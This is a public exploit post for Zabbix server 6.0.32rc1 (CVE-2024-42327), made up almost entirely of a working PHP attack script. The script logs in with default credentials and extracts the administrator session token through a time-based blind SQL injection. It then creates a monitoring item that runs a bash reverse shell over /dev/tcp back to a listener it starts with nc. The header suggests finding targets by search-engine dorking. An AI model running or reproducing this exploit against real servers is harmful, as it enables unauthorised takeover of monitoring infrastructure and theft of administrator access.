============================================================================================================================================= | # Title : Zabbix server v 6.0.32rc1 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.zabbix.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: The following code exploits the CVE-2024-42327 vulnerability, performs identity verification, leaks the API token, and then sends code to reverse the shell [+] save code as poc.php . [+] Set Target : line 141 [+] USage : C:\www>php 2.php [+] PayLoad : "2.0", "method" => "user.login", "params" => [ "username" => $username, "password" => $password ], "id" => 1 ]); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); curl_close($ch); $responseJson = json_decode($response, true); if (isset($responseJson['result'])) { echo "[+] تم تسجيل الدخول بنجاح! التوكن API: " . $responseJson['result'] . "\n"; return $responseJson['result']; } else { echo "[-] فشل تسجيل الدخول. الاستجابة: " . $response . "\n"; exit(); } } function sendInjection($url, $authToken, $position, $char, $sleepTime, $row) { $data = json_encode([ "jsonrpc" => "2.0", "method" => "user.get", "params" => [ "output" => ["userid", "username"], "selectRole" => [ "roleid", "name AND (SELECT * FROM (SELECT(SLEEP($sleepTime - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT $row,1), $position, 1))=" . ord($char) . ", 0, $sleepTime)))))BEEF)" ], "editable" => 1, ], "auth" => $authToken, "id" => 1 ]); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); curl_close($ch); return $response; } function extractApiToken($url, $authToken, $position, $charset, $sleepTime) { foreach (str_split($charset) as $char) { $response = sendInjection($url, $authToken, $position, $char, $sleepTime, 0); $responseTime = substr($response, -5); // محاكاة التعامل مع التأخير if ($sleepTime < $responseTime && $responseTime < $sleepTime + 0.5) { return $char; } } return null; } function getHostIds($url, $apiTokenAdmin) { $data = json_encode([ "jsonrpc" => "2.0", "method" => "host.get", "params" => [ "output" => ["hostid", "host"], "selectInterfaces" => ["interfaceid"] ], "auth" => $apiTokenAdmin, "id" => 1 ]); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); curl_close($ch); $responseJson = json_decode($response, true); if (isset($responseJson['result'][0])) { $hostId = $responseJson['result'][0]['hostid']; $interfaceId = $responseJson['result'][0]['interfaces'][0]['interfaceid']; return [$hostId, $interfaceId]; } else { echo "[-] لم يتم العثور على أجهزة في الاستجابة.\n"; return [null, null]; } } function sendReverseShellRequest($url, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort) { $data = json_encode([ "jsonrpc" => "2.0", "method" => "item.create", "params" => [ "name" => "rce", "key_" => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]", "delay" => 1, "hostid" => $hostId, "type" => 0, "value_type" => 1, "interfaceid" => $interfaceId, ], "auth" => $apiTokenAdmin, "id" => 1 ]); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_exec($ch); curl_close($ch); } $zabbixUrl = "http://example.com/api_jsonrpc.php"; $username = "admin"; $password = "admin"; $listenIp = "tun0"; $listenPort = 4444; $threads = 10; $sleepTime = 1; $row = 0; $length = 32; $charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $proxy = null; // استخدم NULL إذا لم يكن هناك وكيل // بدء العملية $apiToken = zabbixAuthenticate($zabbixUrl, $username, $password); $apiTokenAdmin = ''; for ($position = 0; $position < $length; $position++) { $char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime); if ($char !== null) { $apiTokenAdmin .= $char; echo "\r[*] استخراج التوكن API للمسؤول: " . $apiTokenAdmin; flush(); } } echo "\n[*] الحصول على معرّفات الأجهزة ...\n"; list($hostId, $interfaceId) = getHostIds($zabbixUrl, $apiTokenAdmin); if ($hostId && $interfaceId) { echo "[*] بدء الاستماع وإرسال الـ reverse shell ...\n"; sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort); shell_exec("nc -lnvp $listenPort"); } else { echo "[-] فشل الحصول على معرّف الجهاز أو الواجهة.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================